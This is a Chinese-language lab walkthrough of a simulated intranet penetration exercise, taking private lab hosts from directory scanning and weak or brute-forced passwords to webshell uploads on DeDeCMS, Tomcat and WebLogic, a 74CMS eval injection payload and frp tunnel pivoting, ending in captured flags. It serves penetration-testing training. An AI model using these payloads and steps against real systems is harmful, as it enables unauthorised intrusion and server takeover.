# 简易内网渗透演练

[TOC]

## 一.靶场介绍

#### 1.场景介绍

本靶场通过常见CMS站以及中间件服务站点进行搭建，以小型服务网络作为基础架构，模拟小型的内外网环境。靶场模拟了从外网打点到内网渗透测基础过程，涉及到目录扫描、口令爆破、代理隧道、漏洞利用等知识点。

#### 2.场景拓扑

![image-20220621162818060206-1655800246591308.png](简易内网渗透演练.assets/f019442e803f9ad76be970e1ed080a94.png)

#### 3.攻击路线

![image-20220621162837048317-1655800250397140.png](简易内网渗透演练.assets/696cc7a8e5a029f447b8c8d80ea3a70c.png)

#### 4.知识点

CMS公开漏洞利用

文件上传漏洞利用

目录扫描

BurpSuite工具使用

连接代理

#### 5.CVE漏洞编号

CVE-2018-2894

CVE-2020-35339

#### 6.Attack&ck模型/Shield防御模型

T1595 - 主动扫描

T1090 - 连接代理

T1059 - 命令行界面

T1203 - 利用客户端漏洞获取执行权限

T1110 - 暴力破解

T1005 - 从本地系统收集敏感数据

#### 7.Engage攻防模型

EAC0014 - 软件操作

EAC0004 - 网络分析

EAC0021 - 攻击向量迁移

EAC0003 - 系统活动监控

## 二.靶场题解

#### 阶段一：Web01主机渗透测试

##### 任务1：DeDeCMS弱口令登陆（T1595 - 主动扫描、T1059 - 命令行界面）

```
本场景的第1个任务是利用目录扫描工具可以发现DeDeCMS的登录后台并尝试登录。

dede是织梦内容管理系统dedecms的简称，是一个PHP开源网站管理系统，也是使用用户最多的PHP类CMS系统。

该任务可以通过以下操作完成。
```

已知目标地址`192.168.1.100`，`Win10攻击机`使用扫描工具进行探测，工具路径如下，进入该目录：

![image-20220609160311010596-1655800251951994.png](http://192.168.79.239/ct/upload/other/056f66a967200cd0526d2d82d8e412a6.png)

在地址栏输入cmd并回车启动命令行：

![image-20220609160419593290-1655800253373187.png](简易内网渗透演练.assets/680bb6b461ea7574ccec9fa1075284f9.png)

运行命令启动扫描：

```
python3 dirsearch.py -u 192.168.1.100 -e *
```

![image-20220609160709038705-1655800254769488.png](http://192.168.79.239/ct/upload/other/962fa34e76a05b9a7caee9890432fc0b.png)

发现dede目录，尝试访问：

![image-20220609160756348768-1655800256156783.png](http://192.168.79.239/ct/upload/other/a6bb1c059358dcba7c130da1e9bade2e.png)

发现uploads目录，判断dedecms为默认安装，尝试访问后台：

```
http://192.168.1.100/dede/uploads/dede
```

![image-20220609160929189033-1655800257548064.png](http://192.168.79.239/ct/upload/other/bcab0bd98eaaa35ab111162521e3c121.png)

尝试使用弱口令`admin/admin`登录，登录成功：

![image-20220609161034491263-1655800258930305.png](http://192.168.79.239/ct/upload/other/c7fdd54802d02ce8b4f0ddd6fedb07c7.png)

##### 任务2：文件上传GetShell（T1203 - 利用客户端漏洞获取执行权限）

```
本场景的第2个任务是利用文件上传漏洞GetShell。

文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端命令的能力。一般都是指“上传Web脚本能够被服务器解析”的问题。

该任务可以通过以下操作完成。
```

查看DeDeCMS的版本，发现是V5.7版本，该版本存在文件上传漏洞：

![image-20220609161131368980-1655800260312612.png](http://192.168.79.239/ct/upload/other/24e2a3920cfcc648c1f193d4a9eac47e.png)

点击`文件式管理器`>>`文件上传`（若无反应请网站加载完成后再次尝试）：

![image-20220609161228846160-1655800261682614.png](http://192.168.79.239/ct/upload/other/af9b11ba035f010d91307f6c8e52702b.png)

点击`选择文件`>>`shell.php`>>`打开(O)`：

![image-20220609161351278047-1655800263081928.png](http://192.168.79.239/ct/upload/other/149b45531756db92e81d3835b2efdc02.png)

点击`上传文件`

![image-20220609161431790604-1655800264861342.png](http://192.168.79.239/ct/upload/other/f695db175be04a18b6475c31ad6223e5.png)

后门文件上传成功：

![image-20220609161504015831-1655800266238652.png](http://192.168.79.239/ct/upload/other/d726dcd00f76a8f39db7d984404b19ac.png)

使用冰蝎Shell管理工具进行连接，工具路径如下：

![image-20220609161559020802-1655800268023614.png](http://192.168.79.239/ct/upload/other/233da8b7700e11025de4720eb87a8c22.png)

进入工具目录，双击`Behinder.jar`启动：

![image-20220609161637246317-1655800269394077.png](http://192.168.79.239/ct/upload/other/a4f59dc4d454bc74bab0563823e84ea9.png)

右键新增shell：

![image-20220609161803091615-1655800270758055.png](http://192.168.79.239/ct/upload/other/7e083e34367fc51c58498dea2fdb6931.png)

shell信息如下：

```
URL：http://192.168.1.100/dede/uploads/uploads/shell.php

密码：rebeyond
```

![image-20220609161938653249-1655800272151330.png](http://192.168.79.239/ct/upload/other/c42904bcd582ddf5a88e774aa50e2ad2.png)

点击`保存`后出现URL：

![image-20220609162010341650-1655800273829629.png](http://192.168.79.239/ct/upload/other/e307a9d3277b1ce88a94d215f53d2d00.png)

双击URL，点击`虚拟终端`>>`启动`，输入命令查看权限：

![image-20220609162236544120-1655800275249834.png](http://192.168.79.239/ct/upload/other/293947d7efded3feaad562fa49fae52f.png)

成功获取system权限。

`文件管理`中发现flag：

![image-20220621154447723817-1655800276639262.png](http://192.168.79.239/ct/upload/other/d14a20284308f13ec3199fe8a553fbf5.png)

```
flag{9710-42A0-3272-1A49-4A16-638C-30A4-85E8}
```

#### 阶段二：Web02主机渗透测试

##### 任务3：字典爆破登录后台（T1059 - 命令行界面、T1110 - 暴力破解）

```
本场景的第3个任务是登陆骑士CMS后台，并且利用Burpsuite进行后台口令爆破。

Burpsuite是用于攻击web应用程序的集成平台，包含了许多工具。Burpsuite为这些工具设计了许多接口，以加快攻击应用程序的过程。所有工具都共享一个请求，并能处理对应的HTTP消息、持久性、认证、代理、日志、警报。

该任务可以通过以下操作完成。
```

内网存活主机探测，进入扫描器目录，路径如下：

![image-20220613144624614177-1655800278052452.png](http://192.168.79.239/ct/upload/other/c9de48905453523322349d915c702676.png)

在该目录下启动命令行，使用s扫描器进行扫描：

```
s.exe tcp 192.168.1.0/24 80
```

![image-20220613113209908159-1655800279445240.png](http://192.168.79.239/ct/upload/other/e88c479fe90e593f327179f2dcb0db10.png)

使用目录扫描工具对目标进行探测，发现目标是74CMS：

```
python3 dirsearch.py -u 192.168.1.150 -e *
```

![image-20220612094340574395-1655800280915312.png](http://192.168.79.239/ct/upload/other/7a644727e7f00bea614be15d3ae9d78b.png)

确认目标是74CMS后尝试访问目标后台地址：

```
http://192.168.1.150/74cms/upload/index.php?m=admin&c=index&a=login
```

![image-20220612094658584280-1655800282303629.png](http://192.168.79.239/ct/upload/other/1a846ad1f5a56c099cf6bdf85e5c8d26.png)

双击Burpsuite工具进行密码爆破：

![image-20220612101527050838-1655800283688925.png](http://192.168.79.239/ct/upload/other/1e4ac70c311373fe98a0ff6151e1fa19.png)

点击`Next`>>`Start Burp`启动工具，点击`Proxy`，此时已开启拦截：

![image-20220612095056441239-1655800285068164.png](http://192.168.79.239/ct/upload/other/26935138c7b62cfb9b6c29cc1f0d76da.png)

浏览器中输入用户名`admin`，密码`123`，切换代理为Burpsuite后点击`登录`：

![image-20220612101637151130-1655800286510278.png](http://192.168.79.239/ct/upload/other/194977fc4efc8dba4af899c57de30904.png)

Burpsuite工具中找到登录动作的包，可通过点击Forword进行过滤：

![image-20220612101748725314-1655800287921590.png](http://192.168.79.239/ct/upload/other/c1f874d0668cdc1f2a5d31a595264f13.png)

将包发送给`Intruder`：

![image-20220612101841006694-1655800289300974.png](http://192.168.79.239/ct/upload/other/0dc20b20f60a869b686437a2467ee601.png)

点击`Intruder`>>`Positions`，点击`Clear`清空所有爆破点，双击密码：

![image-20220612102121198387-1655800291081055.png](http://192.168.79.239/ct/upload/other/04017b9108bb8016660a7bf892bdfae2.png)

点击`Add`设置为爆破点：

![image-20220612102203480703-1655800292471340.png](http://192.168.79.239/ct/upload/other/191d6b91cd879f43e79e022bb7161422.png)

点击`Payloads`，点击`Load ...`添加字典，字典的绝对路径为`C:\Users\Administrator\Desktop\工具\字典\lotDict\password.txt`：

![image-20220612102416976080-1655800293840794.png](http://192.168.79.239/ct/upload/other/0b752388653dce4840a7ab2da4626bdd.png)

点击`Start attack`进行爆破：

![image-20220612102450020771-1655800295223808.png](http://192.168.79.239/ct/upload/other/495df3f4af6fd7fc5969e8609e2c7b55.png)

按照`length`进行排序，发现密码`123456`的长度比较特殊：

![image-20220613090752919842-1655800296601075.png](http://192.168.79.239/ct/upload/other/99b01404ec1155388612deabbbfd6b66.png)

关闭爆破窗口，点击`Discard`：

![image-20220613150630384550-1655800298067564.png](http://192.168.79.239/ct/upload/other/4714c3aef63f5e884e271d12acb2fc54.png)

关闭拦截：

![image-20220612102827691688-1655800299450355.png](http://192.168.79.239/ct/upload/other/74ab09c8761afdbb3b004846812bde86.png)

Burpsuite工具中设置代理规则：

![image-20220612165855373220-1655800300825377.png](http://192.168.79.239/ct/upload/other/4fae37002e18545f520cd282106738b6.png)

将代理切换为`系统代理`，若出现提示需要重新提交表单，点击`继续`：

![image-20220613150733015983-1655800302244587.png](http://192.168.79.239/ct/upload/other/568ad58b2c2d42048ccf1249634bd33a.png)

尝试使用`admin/123456`进行登录，点击`登录`：

![image-20220613150834119365-1655800303640788.png](http://192.168.79.239/ct/upload/other/c345b80bf1b682e06c84d6563f0b9782.png)

登录成功后点击`取消`：

![image-20220612111755279745-1655800305044044.png](http://192.168.79.239/ct/upload/other/7a72c748011b6a7d9a55a606dff11feb.png)

##### 任务4：任意代码执行（T1203 - 利用客户端漏洞获取执行权限）

```
本场景的第4个任务是在后台利用公开漏洞进行Shell的获取。

骑士cms人才系统，是一项基于PHP+MYSQL为核心开发的一套免费+开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度，骑士人才系统已成国内同类软件中的最好用的人才系统。

该任务可以通过以下操作完成。
```

点击`系统`，`网站域名`输入`http://127.0.0.1/.',eval($_POST[cmd]),'/.com`：

![image-20220612112000998442-1655800306409392.png](http://192.168.79.239/ct/upload/other/d469861f3599161866abff3d2cbe89a2.png)

点击`保存修改`：

![image-20220612112022243891-1655800307920469.png](http://192.168.79.239/ct/upload/other/75f5d12dd8b375227ffc5c245304ec87.png)

启动蚁剑工具：

![image-20220612112116956314-1655800309407288.png](http://192.168.79.239/ct/upload/other/5b9b462443ac7a4f260f7a2c642119be.png)

添加shell：

![image-20220612112137830101-1655800310826496.png](http://192.168.79.239/ct/upload/other/feeba675ebfab4ea6eeffe467be6e38d.png)

shell信息如下：

```
URL地址：http://192.168.1.150/74cms/upload/index.php?m=admin

连接密码：cmd
```

![image-20220612112244453341-1655800312324589.png](http://192.168.79.239/ct/upload/other/68c53c2e937b1c2b4115bf6a191fd975.png)

点击`添加`后右键URL点击`虚拟终端`，进入终端后查看权限：

![image-20220612112357749897-1655800313752772.png](http://192.168.79.239/ct/upload/other/e8f3a1bc657abdc4746b8b6b7facab23.png)

双击URL进入文件管理，发现flag：

![image-20220621154722685527-1655800315194918.png](http://192.168.79.239/ct/upload/other/e8b72419dba9a7853d223df65f495fa7.png)

```
flag{B6AB-7C20-AC52-F913-E56E-327A-FD82-1F8A}
```

##### 任务5：内网主机探测（T1595 - 主动扫描）

```
本场景的第5个任务是利用扫描器探测内网存活主机。

远程命令执行漏洞，用户通过浏览器提交执行命令，由于服务器端没有针对执行函数做过滤，导致在没有指定绝对路径的情况下就执行命令，可能会允许攻击者通过改变$PATH或程序执行环境的其他方面来执行一个恶意构造的代码。

该任务可以通过以下操作完成。
```

将s扫描器上传至蚁剑中：

![image-20220612173333390539-1655800316670975.png](http://192.168.79.239/ct/upload/other/b15f77839b2b6413256977a6be3273cd.png)

蚁剑工具中`s.exe`文件所在目录下右键点击`>_ 在此处打开终端`，执行命令：

```
s.exe tcp 192.168.2.0/24 22,80,135,8080,3389 > 1.txt
```

![image-20220612174502897298-1655800318100119.png](http://192.168.79.239/ct/upload/other/3d6557fc7d1c2a5694730e009d3c5bb7.png)

刷新`s.exe`文件所在目录，双击查看扫描结果`1.txt`，发现两台存活主机。：

![image-20220612174638868417-1655800319510352.png](http://192.168.79.239/ct/upload/other/98824820e63b1451d2f8120a5e493993.png)

若未发现请等待扫描结束，扫描结束标志如下：

![image-20220612174712814154-1655800320941936.png](http://192.168.79.239/ct/upload/other/5b22c7973a45cecd63e2520b0d95b2ae.png)

##### 任务6：搭建代理隧道（T1059 - 命令行界面、T1090 - 连接代理）

```
本场景的第6个任务是利用frp工具建立代理隧道。

内网穿透，也即NAT穿透，进行NAT穿透是为了使具有某一个特定源IP地址和源端口号的数据包不被NAT设备屏蔽而正确路由到内网主机。下面就相互通信的主机在网络中与NAT设备的相对位置介绍内网穿透方法。

该任务可以通过以下操作完成。
```

进入代理工具目录，目录如下：

![image-20220609162606492726-1655800322359019.png](http://192.168.79.239/ct/upload/other/57d6cc476096afd754f770b6162aca09.png)

配置`frpc.ini`文件，内容如下：

![image-20220609162717532470-1655800323760525.png](http://192.168.79.239/ct/upload/other/ec4e848fafd0180ef4c87f35331ae7fb.png)

蚁剑工具中双击URL进入文件目录，将`frpc.exe`文件和`frpc.ini`文件通过拖拽的方式进行上传：

![image-20220612174917013652-1655800325164748.png](http://192.168.79.239/ct/upload/other/782893c69d645c2bc6fc0574b0ff0772.png)

`Win10攻击机`中，在代理工具的目录下，地址栏输入cmd并回车启动命令行：

![image-20220609163736490896-1655800326538134.png](http://192.168.79.239/ct/upload/other/59c3fc5bb19ad7cc6d47a02e418c72c9.png)

输入命令启动代理服务端：

```
frps.exe -c frps.ini
```

![image-20220609163836110630-1655800327922210.png](http://192.168.79.239/ct/upload/other/6861794fc4f840d96c30fccd6388c907.png)

蚁剑工具中`frpc.exe`文件所在目录下右键点击`>_ 在此处打开终端`，执行命令：

```
frpc.exe -c frpc.ini
```

![image-20220612144813333440-1655800329305960.png](http://192.168.79.239/ct/upload/other/5d8809a4c7e507b125702b99666031f5.png)

隧道建立成功：

![image-20220612094014505403-1655800331123733.png](http://192.168.79.239/ct/upload/other/93747191ca1cf1df395f6a585731a1f4.png)

后续任务中若出现访问网站较慢或卡顿的情况，请在`frps.exe`运行的命令行中连续回车，观察是否有连续的流量报文，若问题仍未解决，快捷键`Ctrl + C`终止`frps.exe`进程并迅速按`↑`键后回车，重启代理服务端。

#### 阶段三：Service01主机渗透

#####   任务7：Tomcat服务弱口令登录（T1090 - 连接代理）

```
本场景的第7个任务是发现Tomcat后台并尝试弱口令登录。

Tomcat是Apache软件基金会（Apache Software Foundation）的Jakarta项目中的一个核心项目，由Apache、Sun和其他一些公司及个人共同开发而成。由于有了Sun的参与和支持，最新的Servlet和JSP规范总是能在Tomcat中得到体现，Tomcat 5支持最新的Servlet 2.4和JSP 2.0规范。因为Tomcat技术先进、性能稳定，而且免费，因而深受Java爱好者的喜爱并得到了部分软件开发商的认可，成为比较流行的Web应用服务器。

该任务可以通过以下操作完成。
```

谷歌浏览器新增代理：

![image-20220613091341140271-1655800332502050.png](http://192.168.79.239/ct/upload/other/b92b0f83d8c9619cb863ca5538bd3a59.png)

点击`新建情景模式...`

![image-20220613091420454989-1655800333909514.png](http://192.168.79.239/ct/upload/other/caba9f4245e39728a4bd4972008cb730.png)

命名为`frp`，点击`创建`：

![image-20220613091509193747-1655800335304965.png](http://192.168.79.239/ct/upload/other/459914744edf3b51fcd564b9eaefd998.png)

设置代理规则：

![image-20220613091825150017-1655800336714488.png](http://192.168.79.239/ct/upload/other/e3ae57452a42685ca19c5b68da219e7b.png)

完成配置后点击`应用选项`进行保存：

![image-20220613091903245148-1655800338083830.png](http://192.168.79.239/ct/upload/other/b33f6a729c535a0c8aead4262551d83c.png)

尝试访问`http://192.168.2.50:8080`，浏览器切换至frp代理：

![image-20220613092016061646-1655800339463144.png](http://192.168.79.239/ct/upload/other/ab00641fcda4929a21d42caaf5733a64.png)

进入Tomcat管理后台：

![image-20220612135015298620-1655800340839502.png](http://192.168.79.239/ct/upload/other/a00d5ebba9dc7e02e05cf87cb1816c9e.png)

尝试弱口令登录，最终通过`admin/1234`登录成功：

![image-20220613092112323676-1655800342190700.png](http://192.168.79.239/ct/upload/other/02604ac40917fdbbc34e87f00ef3e522.png)

登陆成功后发现上传点：

![image-20220612135220472132-1655800343989893.png](http://192.168.79.239/ct/upload/other/646105809a3df8a74ca14b2238b0ea39.png)

#####  任务8：文件上传获取权限（T1203 - 利用客户端漏洞获取执行权限）

```
本场景的第8个任务是制作jsp的war包并上传，获取目标权限。

如果一个Web应用程序的目录和文件非常多，那么将这个Web应用程序部署到另一台机器上，就不是很方便了，这时可以将Web应用程序打包成Web归档（WAR）文件，这个过程和把Java类文件打包成JAR文件的过程类似。利用WAR文件，可以把Servlet类文件和相关的资源集中在一起进行发布。在这个过程中，Web应用程序就不是按照目录层次结构来进行部署了，而是把WAR文件作为部署单元来使用。

该任务可以通过以下操作完成。
```

进入`C:\Users\Administrator\Desktop\工具\shell\Behinder_v3.0_Beta_11.t00ls\server`目录，将`shell.jsp`文件进行压缩：

![image-20220621161246262688-1655800345351400.png](http://192.168.79.239/ct/upload/other/27ba12c34fe101a457785a9deb2951c6.png)

重命名`shell.zip`文件为`shell.war`

![image-20220621161332750682-1655800347060831.png](http://192.168.79.239/ct/upload/other/0e06536f06c7f196ad55d1094aaf71a7.png)

该`shell.war`进行上传：

![image-20220621161432780535-1655800348443138.png](http://192.168.79.239/ct/upload/other/2f5098ff06a18deaa5cb427fc39e2d4b.png)

点击`Deploy`进行上传：

![image-20220612141238418934-1655800349815471.png](http://192.168.79.239/ct/upload/other/4882d86b669e71106c6a9d046f431e07.png)

上传成功：

![image-20220621161508724195-1655800351167584.png](http://192.168.79.239/ct/upload/other/27c56936cf41859afaed87601d8d4d90.png)

冰蝎工具设置代理：

![image-20220613093116399239-1655800352528914.png](http://192.168.79.239/ct/upload/other/d941b3707000dc266070fb2d4e19fcbe.png)

代理信息如下，设置完成后点击`保存`：

![image-20220613093152958901-1655800353894316.png](http://192.168.79.239/ct/upload/other/5afca0ec2c0dfbedf03a680190427428.png)

新增shell，shell信息如下：

```
URL：http://192.168.2.50:8080/shell/shell.jsp

密码：rebeyond
```

![image-20220612150812616328-1655800355267108.png](http://192.168.79.239/ct/upload/other/d910582c4c977f70b690223933f6c693.png)

点击`保存`后双击新增的URL，显示`已连接`后点击`虚拟终端`，执行命令给查看权限：

![image-20220612150957253826-1655800356638362.png](http://192.168.79.239/ct/upload/other/f406d5ed769ac01942e658b448bb0f55.png)

冰蝎工具中进入`文件管理`，发现flag：

![image-20220621155527524726-1655800358267006.png](http://192.168.79.239/ct/upload/other/b892b2edfaa35d2e5bd58f3070dc0ece.png)

```
flag{76D4-523B-9B4E-CF39-262F-3791-28C1-93B8}
```

#### 阶段四：Service02主机渗透

##### 任务9：敏感信息泄漏（T1005 - 从本地系统收集敏感数据）

```
本场景的第9个任务是目标主机信息收集，发现敏感文件。

信息收集是指通过各种方式获取所需要的信息。信息收集是信息得以利用的第一步，也是关键的一步。信息收集工作的好坏，直接关系到整个信息管理工作的质量。

该任务可以通过以下操作完成。
```

发现敏感文件：

![image-20220621155609126191-1655800359635991.png](http://192.168.79.239/ct/upload/other/ce6b4979f09a93ab8bf2968eefb9d452.png)

双击该文件发现敏感信息：

![image-20220612162915343838-1655800360999526.png](http://192.168.79.239/ct/upload/other/97789b4794562a26424fc3b345b81f56.png)

之前的扫描结果中存在另外一台存活主机，尝试访问WebLogic默认后台：

```
http://192.168.2.100:7001/console
```

![image-20220612163120944335-1655800362777565.png](http://192.168.79.239/ct/upload/other/400c2d71aa89c5c77288dc9bddd4e0e9.png)

成功发现后台，尝试使用敏感信息`weblogic/saining123456`登录：

![image-20220612163440084172-1655800364151624.png](http://192.168.79.239/ct/upload/other/ec0311cd2c2fbb1e0b024b4a5b6d8ab7.png)

登录成功，将其余标签页关闭：

![image-20220612163629935958-1655800365434965.png](http://192.168.79.239/ct/upload/other/fc1b8966d541065730adfae92e663417.png)

发现`WebLogic Server`版本为`12.2.1.3.0`，可能存在漏洞：

![image-20220612163806531290-1655800366784294.png](http://192.168.79.239/ct/upload/other/4421ce80ab76b51de24b32724312ae65.png)

##### 任务10：文件上传漏洞利用（T1203 - 利用客户端漏洞获取执行权限）

```
本场景的第10个任务是利用文件上传漏洞获取目标主机权限。

WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

该任务可以通过以下操作完成。
```

点击`base_domain`：

![image-20220316232138000000-1655800368317198.png](http://192.168.79.239/ct/upload/other/e6e26f84d40317d921822c20d29254b2.png)

展开`高级`：

![image-20220613122255592438-1655800369753415.png](http://192.168.79.239/ct/upload/other/60d7a23c2ab85b5cde027533e9c1de28.png)

勾选下方的`启用Web服务测试页`：

![image-20220612164016747598-1655800371587158.png](http://192.168.79.239/ct/upload/other/51b4cb3be55dd4166a22cab43d6f1dce.png)

点击最下方的`保存`：

![image-20220612164047626729-1655800372965460.png](http://192.168.79.239/ct/upload/other/ef0e3f2e8236e2bed5169e2ff2ce7218.png)

保存后打开新的标签页访问`http://192.168.2.100:7001/ws_utc/config.do`，若显示较慢可利用任务6结尾的方法重启代理服务端，代理隧道重建后再刷新查看：

![image-20220612164231545523-1655800374343804.png](http://192.168.79.239/ct/upload/other/89c26d16b0d0222f0cfb081967363fb8.png)

将敏感文件中`path:`后面的部分复制粘贴至`当前的工作目录`，替换原有的内容：

![image-20220612164737524060-1655800375698192.png](http://192.168.79.239/ct/upload/other/66532d600c1f2ff0eb6f668c3bb9c38f.png)

完成后点击`提交`>>`确定`>>`安全`：

![image-20220612164852179007-1655800377107462.png](http://192.168.79.239/ct/upload/other/5be2694ffa1e7213ff01f44af1377d75.png)

点击`添加`，弹出框中的输入栏输入两次`123`，点击`选择文件`，选中`C:\Users\Administrator\Desktop\工具\shell\Behinder_v3.0_Beta_11.t00ls\server`目录下的`shell.jsp`文件并点击`打开（O）`，上传完成后先不要点击`提交`：

![image-20220612171147574283-1655800378463469.png](http://192.168.79.239/ct/upload/other/24b6ff33d6e0d91e9b17cd65d2dc0349.png)

Burpsuite工具开启拦截：

![image-20220613123102773502-1655800379836801.png](http://192.168.79.239/ct/upload/other/421391e2de45e40c5f12149a6893bcc1.png)

浏览器中切换代理模式为`Burpsuite`后迅速点击`提交`按钮：

![image-20220613123758050591-1655800381193575.png](http://192.168.79.239/ct/upload/other/3d0146677bab59de47d0193b747195db.png)

Burpsuite工具闪烁，拦截到包信息，点击`Forward`找到下图所示类似的包：

![image-20220612171304860156-1655800382564958.png](http://192.168.79.239/ct/upload/other/353e412cba29640320ec792413a7ea7c.png)

将包发送到`Repeater`：

![image-20220612171612526601-1655800383879451.png](http://192.168.79.239/ct/upload/other/2c7a5037a5c02f02512732936eeac422.png)

`Repeater`中发送数据包：

![image-20220612171710002704-1655800385258055.png](http://192.168.79.239/ct/upload/other/05bdf915f55e270ee5324eb3eae10e75.png)

`Response`中出现响应，获取到时间戳：

![image-20220612171826590586-1655800387126804.png](http://192.168.79.239/ct/upload/other/8d181d88c5406792f01babd4c2d8b190.png)

拼接shell：

```
URL：http://192.168.2.100:7001/ws_utc/css/config/keystore/时间戳_shell.jsp

密码：rebeyond
```

使用冰蝎工具连接：

![image-20220612172042621749-1655800388502184.png](http://192.168.79.239/ct/upload/other/37c74068232db8990f65068514a6be1f.png)

双击新增的URL，在`命令执行`中查看权限：

![image-20220612172325964993-1655800389937028.png](http://192.168.79.239/ct/upload/other/a66491e75c20f8a59418618c3a29ae6f.png)

`文件管理`中发现flag：

![image-20220621162207987092-1655800391301692.png](http://192.168.79.239/ct/upload/other/8fdb555631c789a2877548f7991e4021.png)

```
flag{B719-1F1D-4CE7-E019-2E6B-EDAC-CB35-87FB}
```